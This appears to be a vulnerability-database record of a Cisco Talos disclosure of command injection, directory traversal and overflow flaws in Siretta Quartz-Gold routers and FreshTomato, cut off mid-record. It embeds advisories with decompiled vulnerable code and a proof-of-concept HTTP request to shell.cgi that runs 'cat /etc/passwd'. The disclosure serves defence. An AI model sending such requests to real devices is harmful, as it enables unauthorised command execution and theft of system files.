Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato

2023-01-26T21:26:14

Description

![Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato](https://blog.talosintelligence.com/content/images/2023/01/vuln-spotlight-3.jpg) _Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._ Cisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router. The Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers. ### Quartz-Gold Vulnerabilities Several OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. [TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request. Three directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. [TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read. Three stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. [TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests. A heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request. Two other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests. ### FreshTomato Vulnerabilities In FreshTomato, there is [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, [TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities. Cisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>). Users are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities. The following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

{"id": "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "vendorId": null, "type": "talosblog", "bulletinFamily": "blog", "title": "Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato", "description": "![Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato](https://blog.talosintelligence.com/content/images/2023/01/vuln-spotlight-3.jpg)\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.\n\nThe Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\n### Quartz-Gold Vulnerabilities\n\nSeveral OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. [TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.\n\nThree directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. [TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read.\n\nThree stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. [TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.\n\nA heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request.\n\nTwo other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.\n\n### FreshTomato Vulnerabilities\n\nIn FreshTomato, there is [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, [TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities.\n\nCisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "published": "2023-01-26T21:26:14", "modified": "2023-01-26T21:26:14", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/", "reporter": "Kri Dontje", "references": [], "cvelist": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"], "immutableFields": [], "lastseen": "2023-02-02T20:12:34", "viewCount": 8, "enchantments": {"score": {"value": 1.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"]}, {"type": "talos", "idList": ["TALOS-2022-1605", "TALOS-2022-1606", "TALOS-2022-1607", "TALOS-2022-1608", "TALOS-2022-1609", "TALOS-2022-1610", "TALOS-2022-1611", "TALOS-2022-1612", "TALOS-2022-1613", "TALOS-2022-1615", "TALOS-2022-1637", "TALOS-2022-1638", "TALOS-2022-1639", "TALOS-2022-1640", "TALOS-2022-1641", "TALOS-2022-1642"]}]}, "epss": [{"cve": "CVE-2022-36279", "epss": "0.000800000", "percentile": "0.326210000", "modified": "2023-03-20"}, {"cve": "CVE-2022-38066", "epss": "0.000830000", "percentile": "0.336650000", "modified": "2023-03-20"}, {"cve": "CVE-2022-38088", "epss": "0.000680000", "percentile": "0.277970000", "modified": "2023-03-20"}, {"cve": "CVE-2022-38451", "epss": "0.001250000", "percentile": "0.452600000", "modified": "2023-03-20"}, {"cve": "CVE-2022-38459", "epss": "0.000800000", "percentile": "0.326210000", "modified": "2023-03-20"}, {"cve": "CVE-2022-38715", "epss": "0.000820000", "percentile": "0.332520000", "modified": "2023-03-20"}, {"cve": "CVE-2022-39045", "epss": "0.000700000", "percentile": "0.283330000", "modified": "2023-03-20"}, {"cve": "CVE-2022-40220", "epss": "0.000830000", "percentile": "0.336650000", "modified": "2023-03-20"}, {"cve": "CVE-2022-40222", "epss": "0.001300000", "percentile": "0.461770000", "modified": "2023-03-20"}, {"cve": "CVE-2022-40701", "epss": "0.000630000", "percentile": "0.249700000", "modified": "2023-03-20"}, {"cve": "CVE-2022-40969", "epss": "0.000830000", "percentile": "0.336650000", "modified": "2023-03-20"}, {"cve": "CVE-2022-40985", "epss": "0.001310000", "percentile": "0.462800000", "modified": "2023-03-20"}, {"cve": "CVE-2022-41030", "epss": "0.001130000", "percentile": "0.432770000", "modified": "2023-03-20"}, {"cve": "CVE-2022-41154", "epss": "0.000800000", "percentile": "0.326140000", "modified": "2023-03-20"}, {"cve": "CVE-2022-41991", "epss": "0.000810000", "percentile": "0.328350000", "modified": "2023-03-20"}, {"cve": "CVE-2022-42484", "epss": "0.002080000", "percentile": "0.570240000", "modified": "2023-03-20"}, {"cve": "CVE-2022-42490", "epss": "0.001290000", "percentile": "0.460310000", "modified": "2023-03-20"}, {"cve": "CVE-2022-42493", "epss": "0.001290000", "percentile": "0.460310000", "modified": "2023-03-20"}], "vulnersScore": 1.0}, "_state": {"dependencies": 1675368929, "score": 1684017862, "epss": 1679355295}, "_internal": {"score_hash": "4fa0203432f68ddae30ae603b47cf985"}}

{"talos": [{"lastseen": "2023-06-03T15:19:41", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1640\n\n## Siretta QUARTZ-GOLD m2m m2m_parse_router_config cmd OS command injection vulnerabilities\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-42492,CVE-2022-42491,CVE-2022-42493,CVE-2022-42490\n\n##### SUMMARY\n\nSeveral OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD offers a feature called `M2M`. When enabled, the device will execute the `m2m` binary and offer different network services. One of the services the `m2m` binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.\n\nSeveral commands use the `m2m_parse_router_config` function:\n \n \n uint m2m_parse_router_config(char *data,uint data_len)\n \n {\n [...]\n \n memset(nvram_command,0,0x800);\n memset(param,0,0x400);\n syslog(5,\"----parse_router_config %d:%s----\",data_len,data);\n syslog(5,\"----NVRAM Set Command Start----\");\n len_first_no_& = strspn(data,\"&\");\n strncpy(param,data + len_first_no_&,0x400);\n first_& = strcspn(param,\"&\" );\n param[first_&] = '\\0';\n local_19 = 0;\n pcVar1 = strchr(data + len_first_no_&,L'&');\n while (param[0] != '\\0') {\n memset(nvram_command,0,0x800);\n sprintf(nvram_command,\"nvram set %s\",param); [1]\n syslog(5,\"%s\",nvram_command);\n system(nvram_command); [2]\n [...]\n \n\nThis function will parse data in the UDP packet received. The command expects a list that looks like: `<nvram_key_1>=<nvram_value_1>&<nvram_key_2>=<nvram_value_2>....`. Then, for each key value pair, it will compose at `[1]` the `nvram set <nvram_key>=<nvram_value>`. The composed string will be used as argument for the `system` function at `[2]`. The problem is that from receiving the command packet to `[2]` the data is never sanitized. This allows any string to be used as argument of the `system` call. This can lead to an OS command injection.\n\nFollowing is the list of the vulnerable commands that will call the `m2m_parse_router_config` function.\n\n#### CVE-2022-42490 - DOWNLOAD_CFG_FILE command injection\n\nFollowing is the portion of `m2m` binary that manages the `DOWNLOAD_CFG_FILE` command:\n \n \n syslog(5,\"M2M Command(%02x) DOWNLOAD_CFG_FILE!!!\",0x16);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"DOWNLOAD_CFG_FILE %d:%s\",\n data_len),\n &UDP_data_buff.data);\n temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);\n [...] \n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n#### CVE-2022-42491 - M2M_CONFIG_SET command injection\n\nFollowing is the portion of `m2m` binary that manages the `M2M_CONFIG_SET` command:\n \n \n syslog(5,\"M2M Command(%02x) M2M_CONFIG_SET!!!\",6);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"M2M_CONIFG_SET %d:%s\",\n data_len,\n &UDP_data_buff.data);\n global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data,data_len);\n [...]\n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n#### CVE-2022-42492 - DOWNLOAD_AD command injection\n\nFollowing is the portion of `m2m` binary that manages the `DOWNLOAD_AD` command:\n \n \n syslog(5,\"M2M Command(%02x) DOWNLOAD_AD!!!\",0xe);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"M2M_CONIFG_SET %d:%s\",\n data_len,\n &UDP_data_buff.data);\n if (DOWNLOAD_THREAD_STARTED == 0) {\n global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data,data_len);\n [...]\n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n#### CVE-2022-42493 - DOWNLOAD_INFO command injection\n\nFollowing is the portion of `m2m` binary that manages the `DOWNLOAD_INFO` command:\n \n \n syslog(5,\"M2M Command(%02x) DOWNLOAD_INFO!!!\",0xc);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"M2M_CONIFG_SET %d:%s\",\n data_len,\n &UDP_data_buff.data);\n nvram_unset(\"type\");\n temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);\n [...]\n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1682\n\nPrevious Report\n\nTALOS-2022-1637\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD m2m m2m_parse_router_config cmd OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42490", "CVE-2022-42491", "CVE-2022-42492", "CVE-2022-42493"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1640", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:43", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1610\n\n## Siretta QUARTZ-GOLD httpd shell.cgi leftover debug code vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38715\n\n##### SUMMARY\n\nA leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-489 - Leftover Debug Code\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nBased on the web page shown, functionalities and the documentation publicly available, the QUARTZ-GOLD does not provide any way to directly access the linux system that runs on the router. The router\u2019s web server is based on AdvancedTomato, which offers several debug APIs active by default. The developer, allegedly, forgot to disable those debug APIs. For instance, the AdvancedTomato\u2019s `shell.cgi` API is still active, allowing arbitrary command execution:\n \n \n static void wo_shell(char *url)\n {\n web_puts(\"\\ncmdresult = '\");\n _execute_command(NULL, webcgi_get(\"command\"), NULL, WOF_JAVASCRIPT);\n web_puts(\"';\");\n }\n \n\n`wo_shell` is the function that is called when the `shell.cgi` API is requested. This function will call the `_execute_command` with the request\u2019s `command` parameter. This function will effectively execute the provided shell command. The leftover debug code allows arbitrary command execution.\n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /shell.cgi HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 52\n \n command=cat /etc/passwd&_http_id=<the correct tid>\n \n\nWill generate the following response:\n \n \n HTTP/1.0 200 OK\n Date: Sat, 01 Jan 2000 22:01:30 GMT\n Content-Type: text/javascript\n Cache-Control: no-cache, no-store, must-revalidate, private\n Expires: Thu, 31 Dec 1970 00:00:00 GMT\n Pragma: no-cache\n Connection: close\n \n \n cmdresult = 'root:x:0:0:root:/root:/bin/sh\\x0aadmin:x:0:0:admin:/root:/bin/sh\\x0anobody:x:65534:65534:nobody:/dev/null:/dev/null\\x0a';\n \n\nThe request will make the router execute the command `cat /etc/passwd` and respond to the HTTP request with the output of the command back.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1615\n\nPrevious Report\n\nTALOS-2022-1608\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd shell.cgi leftover debug code vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38715"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1610", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:43", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1638\n\n## Siretta QUARTZ-GOLD m2m DELETE_FILE cmd OS command injection vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-40222\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many other\n\nThe QUARTZ-GOLD offers a feature called `M2M`. When enabled, the device will execute the `m2m` binary and offer different network services. One of the services the `m2m` binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.\n\nFollowing the portion of `m2m` binary that manages the `DELETE_FILE` command:\n \n \n [...]\n cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;\n if (cmdid_provided == 0x15) {\n syslog(5,\"M2M Command(%02x) DELETE_FILE!!!\",0x15);\n m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;\n m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;\n [... set base_folder variable ...]\n base_folder_length = strlen(base_folder);\n for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);\n current_entry_off = current_entry_off + __bswap_16(previous_data_len)){\n current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));\n if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||\n (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||\n (command_string = calloc(current_data_len + base_folder_length + 0xc,1),\n command_string == 0x0)) { [1]\n [... invalid state ...]\n }\n sprintf(command_string,\"rm -rf %s/%s &\",base_folder,&UDP_data_buff.entries[0].data + current_entry_off\n ); [2]\n syslog(6,\"Deleting file :%s\",command_string + 7);\n system(command_string); [3]\n free(command_string);\n previous_data_len = *(UDP_data_buff.entries[0].data_len + current_entry_off); [4]\n [...]\n \n\nFollowing, we will briefly explain the packet composition for this command:\n \n \n struct M2M_data_entry{\n uint16_t fix_word;\n uint16_t data_len;\n char data[];\n };\n \n struct M2M_packet{\n uint16_t packet_len;\n uint16_t cmd_id;\n uint32_t pkd_id;\n uint16_t version;\n M2M_data_entry entries[];\n };\n \n\nThe UDP packet received, which can contain at most 0x251c bytes, is cast to an `M2M_packet`. This is a variable length structure. Indeed, inside of it there is an array of `M2M_data_entry` structure that is a variable length struct. To seek the various entries, the variable `current_entry_off` is used. It starts with value 0 and then, at `[4]`, the value `M2M_data_entry.data_len` of the just-parsed entry is added to seek, in the next loop, the next entry.\n\nThe `DELETE_FILE` command will execute the command `rm -rf <base_folder>/<M2M_data_entry.data> &` for each entry in the UDP `M2M_packet` packet it received.\n\nAt `[2]` the `rm -rf <base_folder>/<M2M_data_entry.data> &` string is composed and executed at `[3]` through the `system` function. At `[1]` some checks are performed, but none about the content of the `M2M_data_entry.data`. Because any value of `M2M_data_entry.data` is allowed to reach the `system` function call, this function is vulnerable to an OS command injection.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1637\n\nPrevious Report\n\nTALOS-2022-1639\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD m2m DELETE_FILE cmd OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 